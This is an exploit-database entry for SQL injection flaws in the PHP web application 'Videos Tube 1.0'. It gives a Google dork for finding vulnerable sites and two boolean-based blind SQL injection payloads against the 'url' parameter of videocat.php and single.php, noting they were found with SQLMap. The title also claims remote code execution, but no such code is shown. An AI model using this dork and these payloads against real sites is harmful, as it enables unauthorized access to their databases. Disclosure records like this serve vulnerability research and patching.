Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities

ID 1337DAY-ID-22307
Type zdt
Reporter Mustafa ALTINKAYN
Modified 2014-06-01T00:00:00


Exploit for php platform in category web applications

                                            # Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage:
# Software Link:
# Version: 1.0
Description (Açıklama)
Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)

# [2018-01-02]  #